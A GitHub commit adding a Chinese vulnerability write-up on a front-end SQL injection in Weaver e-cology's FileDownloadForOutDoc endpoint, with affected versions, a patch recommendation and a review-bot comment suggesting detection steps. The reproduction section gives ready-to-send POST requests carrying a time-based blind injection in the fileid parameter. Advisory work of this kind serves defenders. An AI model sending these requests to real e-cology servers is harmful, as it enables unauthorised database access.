Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Upload new file: 泛微 OA e-cology FileDownloadForOutDoc 前台 SQL 注入漏洞.md …
…via simpread
Showing 1 changed file with 74 additions and 0 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,74 @@ | ||
> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/Qnmy1vRfE4WBu4hyhBNkQg) | ||
**本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。** | ||
|
||
**漏洞说明** | ||
|
||
泛微 e-cology 是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。 | ||
|
||
泛微 e-cology FileDownloadForOutDoc 未对用户的输入进行有效的过滤,直接将其拼接进了 SQL 查询语句中,导致系统出现 SQL 注入漏洞。 | ||
|
||
**影响版本** | ||
|
||
``` | ||
部分e-cology 8且补丁版本<10.58.0 | ||
部分e-cology 9且补丁版本<10.58.0 | ||
``` | ||
|
||
**漏洞复现** | ||
|
||
![](https://mmbiz.qpic.cn/sz_mmbiz_png/y0627QbVVbV81PXWiaokevaYtVIUE3dFKGpEib1Z8ibptFyRg3ibBo0LEMx8hOlgU8fSCcx3CHs49wTcszfX0PVOpg/640?wx_fmt=png) | ||
|
||
payload: | ||
|
||
``` | ||
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 | ||
Host: ip:port | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 | ||
Content-Length: 45 | ||
Content-Type: application/x-www-form-urlencoded | ||
Accept-Encoding: gzip, deflate | ||
Connection: close | ||
fileid=3+WAITFOR+DELAY+'0:0:8'&isFromOutImg=1 | ||
``` | ||
|
||
请求包: | ||
|
||
``` | ||
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 | ||
Host: ip:port | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 | ||
Content-Length: 45 | ||
Content-Type: application/x-www-form-urlencoded | ||
Accept-Encoding: gzip, deflate | ||
Connection: close | ||
fileid={everything}+WAITFOR+DELAY+'0:0:8'&isFromOutImg=1 | ||
``` | ||
|
||
响应包: | ||
|
||
``` | ||
HTTP/1.1 200 OK | ||
Server: WVS | ||
Cache-Control: private | ||
X-Frame-Options: SAMEORIGIN | ||
X-XSS-Protection: 1 | ||
Set-Cookie: ecology_JSessionid=aaag6HUJ_5F8Y8MrDt2Ky; path=/ | ||
Content-Length: 0 | ||
Connection: close | ||
Date: Tue, 11 Jul 2023 12:54:14 GMT | ||
``` | ||
|
||
![](https://mmbiz.qpic.cn/sz_mmbiz_png/y0627QbVVbV81PXWiaokevaYtVIUE3dFKIuMdp7CDcO2YpprpVlibed6mX6AqasDA6q1ia2Dhcs3O7QB9TjU95fJg/640?wx_fmt=png) | ||
|
||
**修复建议** | ||
|
||
目前官方已发布安全补丁,建议受影响用户尽快将补丁版本升级至 10.58 及以上。https://www.weaver.com.cn/cs/securityDownload.asp# | ||
|
||
本文章仅用于学习交流,不得用于非法用途 | ||
|
||
星标加关注,追洞不迷路 |
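Review bot: The remediation section (修复建议) only says to upgrade to patch 10.58 or later, and nothing in the file tells a defender how to check for exposure or past probing. Add a short detection note, for example reviewing web access logs for POST requests to `/weaver/weaver.file.FileDownloadForOutDoc` whose `fileid` value is not purely numeric, and confirming the installed patch version against the `<10.58.0` threshold given under 影响版本. The two request blocks under `payload:` and `请求包:` are identical apart from the `fileid` value (`3` versus `{everything}`), so keep one and explain the placeholder in prose. The SimpRead import also left WeChat residue that should be dropped before merging: the closing line `星标加关注,追洞不迷路`, and the two `mmbiz.qpic.cn` images, which have empty alt text and are hotlinked from a third-party host, so the write-up loses its evidence if they stop loading. The advisory link ends in a stray `#` and is fused to the preceding sentence; put it on its own line.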